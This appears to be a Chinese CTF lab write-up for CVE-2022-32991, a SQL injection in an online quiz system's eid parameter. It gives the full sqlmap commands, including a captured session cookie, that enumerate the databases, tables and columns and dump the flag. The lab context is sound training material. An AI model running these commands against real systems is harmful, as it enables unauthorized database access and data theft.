当前位置: 首页 > article >正文

春秋云境靶场之CVE-2022-32991

一.访问靶场

1.打开靶场环境

提示我们存在SQL,那么我们就进行SQL注入

2.访问靶场

http://eci-2ze2pi1s2m6ut2vkoyzl.cloudeci1.ichunqiu.com/

我们可以看到一个登录页面,但是我们没有用户名和密码

右下角可以进行注册,我们注册一个账号

3.注册用户名

然后我们进行登录,登录成功

二.SQL注入

1.测试注入点

我们可以看到有3个页面,我们进行访问,可以看到第2个页面和第3个页面的eid不一样,但是n和t是一样的

可以猜测存在SQL注入,我们使用sqlmap进行测试,这里一个知识点,我们不能直接进行注入,如果我们直接输入Login | Online Quiz Systemicon-default.png?t=O83Ahttp://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10这个链接的话是注入不成功的,因为它是一个登录页面,需要身份验证,所以我们必须加入User-Agent和cookie

我们通过burp进行抓包,查看cookie

正确的测试点是

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b",我们可以看到存在SQL注入

2.爆破数据库

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" --dbs --batch

我们可以看到有4个数据库,其中一个是flag,我们进行爆破

3.爆破表名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" --tables --batch

表名有9个,我们还是爆破flag

4.爆破字段名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" -T "flag" --columns

字段名是flag,那么我们直接爆破即可

5.爆破数据名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" -T "flag" -C "flag" --dump

我们可以看到flag,进行提交即可


http://www.kler.cn/a/302976.html

相关文章:

  • Oracle 11g rac 集群节点的修复过程
  • 【测试框架篇】单元测试框架pytest(1):环境安装和配置
  • RAG综述:《A Comprehensive Survey of Retrieval-Augmented Generation (RAG)》
  • 重学SpringBoot3-整合 Elasticsearch 8.x (三)使用Repository
  • 简单的签到程序 python笔记
  • LLMs:MindFormers的简介、安装和使用方法、案例应用
  • 统计在线人数,百万数据表,查询很慢,如何统计,用php如何实现
  • 产品经理如何转型为AI产品经理,如何理解AI产品工程化
  • 工厂安灯系统在优化生产流程上的优势
  • redis底层—数据结构
  • 动态规划问题
  • day48
  • 【hot100-java】【接雨水】
  • NCBI-get-spesis-ref-IDs_fast.py
  • AI与艺术的碰撞:当机器开始创作,创造力何在?
  • HarmonyOS4升级到Harmonyos Next(Api 11)系列教程
  • 音视频开发之旅(93)-图像超分增强之Real-ESRGAN
  • Vue 3 组合式 API
  • C++ | Leetcode C++题解之第393题UTF-8编码验证
  • RabbitMQ SDK 支持发布、消费,连接恢复,死信队列,多种使用场景
  • db.fsyncLock() 和 db.fsyncUnlock()
  • 前后端分离项目实现SSE
  • Redis Sentinel(哨兵)详解
  • 从JVM角度看对象创建过程和内存布局
  • 基于微信小程序+Java+SSM+Vue+MySQL的宿舍管理系统
  • F1C100S/F1C200S的资料来源说明